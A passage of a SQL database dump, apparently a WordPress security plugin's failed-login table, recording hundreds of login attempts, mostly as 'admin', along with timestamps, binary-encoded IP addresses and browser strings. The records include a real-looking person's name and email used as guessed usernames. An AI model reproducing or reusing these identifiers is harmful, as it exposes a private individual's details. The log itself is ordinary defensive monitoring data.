x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5133,7730,1629287520.489567,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5134,7730,1629287521.148028,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5135,7731,1629287947.815575,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5136,7733,1629288690.545406,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���c{)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5137,7734,1629289462.807410,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5138,7735,1629289862.971625,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5139,7736,1629290253.600901,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5140,7737,1629290624.123665,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5141,7738,1629290986.888084,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Q�W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5142,7739,1629291379.869679,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5143,7740,1629291746.192200,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`>w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5144,7741,1629292129.925787,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5145,7742,1629292474.634280,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5146,7743,1629292930.645249,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5147,7744,1629293259.294494,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5148,7745,1629293669.748602,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����4S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5149,7746,1629294102.724914,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5150,7747,1629294491.433805,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5151,7748,1629294880.007848,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@oxI','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5152,7750,1629295656.893703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5153,7751,1629296064.905576,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5154,7752,1629296407.289626,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5155,7753,1629296799.654980,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νr�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5156,7753,1629296799.706207,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νr�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5157,7754,1629297263.263930,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5158,7755,1629297665.314439,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5159,7756,1629298027.387752,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5160,7757,1629298425.314186,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5161,7758,1629298732.473125,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.d,','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5162,7759,1629298817.838318,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[K ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5163,7760,1629299191.199477,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5164,7761,1629299536.532481,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�v','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5165,7762,1629299580.147809,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���C�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5166,7763,1629299993.476057,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5167,7764,1629300344.906484,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(5168,7765,1629300374.012435,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5169,7766,1629300747.702359,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��� F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5170,7767,1629301142.660523,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\r}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5171,7768,1629301143.675198,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5172,7769,1629301555.378029,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5173,7775,1629303120.615783,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5174,7776,1629303432.528744,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5175,7777,1629303532.049875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5176,7778,1629303868.487026,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5177,7779,1629304189.242376,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5178,7780,1629304298.165695,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5179,7781,1629304958.746105,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���75�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5180,7782,1629305091.844674,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5181,7783,1629305465.597074,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5182,7784,1629305723.574613,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5183,7785,1629305832.419015,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5184,7786,1629306559.273020,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5185,7787,1629307255.376772,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5186,7787,1629307255.397699,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5187,7788,1629307881.045969,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5188,7791,1629309100.182929,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5189,7792,1629309541.929139,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(5190,7794,1629310321.630669,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5191,7796,1629311530.213322,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5192,7797,1629311820.110121,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5193,7798,1629312529.313724,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@�','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322)'),(5194,7799,1629312578.919792,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5195,7800,1629312749.306092,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5196,7801,1629313959.780557,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5197,7803,1629314900.985637,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5198,7805,1629315671.153644,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6&I�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5199,7806,1629316368.514005,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5200,7807,1629316440.241303,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����;I','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5201,7813,1629319979.223652,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5202,7814,1629320289.318670,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R@�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(5203,7821,1629323410.970484,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����gI','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(5204,7822,1629323730.795823,1,'loginFailInvalidUsername','adminlin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5205,7834,1629329796.223275,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5206,7835,1629329798.469101,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5207,7836,1629329800.070176,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5208,7837,1629329801.209089,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5209,7838,1629329802.964965,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5210,7839,1629329804.121404,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5211,7840,1629329805.480370,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��-L84','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5212,7844,1629331903.331396,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5213,7845,1629332211.401638,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5214,7845,1629332211.431738,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5215,7847,1629333420.955249,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5216,7849,1629334319.687299,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5217,7850,1629334630.273806,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5218,7863,1629343262.027987,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;Rz','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5219,7868,1629344813.152231,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5220,7871,1629346761.462836,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5221,7872,1629347093.015631,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5222,7875,1629348576.788714,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\r:=G','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(5223,7877,1629349302.204116,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5224,7880,1629350751.426751,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��F$R','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5225,7882,1629351479.875067,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5226,7883,1629352211.496186,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5227,7889,1629355091.310195,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5228,7891,1629355911.027852,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5229,7894,1629357401.433147,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5230,7895,1629357424.093663,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5231,7898,1629358317.360267,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5232,7899,1629358550.824252,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5233,7900,1629358620.341287,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5234,7901,1629358815.836322,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@ts','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5235,7902,1629358895.878889,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y`Z}','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5236,7903,1629359058.689692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���D�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5237,7904,1629359307.116196,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5238,7905,1629359446.403442,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5239,7906,1629359581.742841,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5240,7907,1629359645.827497,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5241,7908,1629359831.124544,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5242,7909,1629360040.064988,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5243,7910,1629360074.930620,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5244,7911,1629360364.679466,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5245,7912,1629360392.637041,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5246,7913,1629360609.826407,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5247,7914,1629360870.518203,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5248,7915,1629361113.821353,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5249,7915,1629361113.855256,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5250,7916,1629361146.573305,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5251,7918,1629361357.909016,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 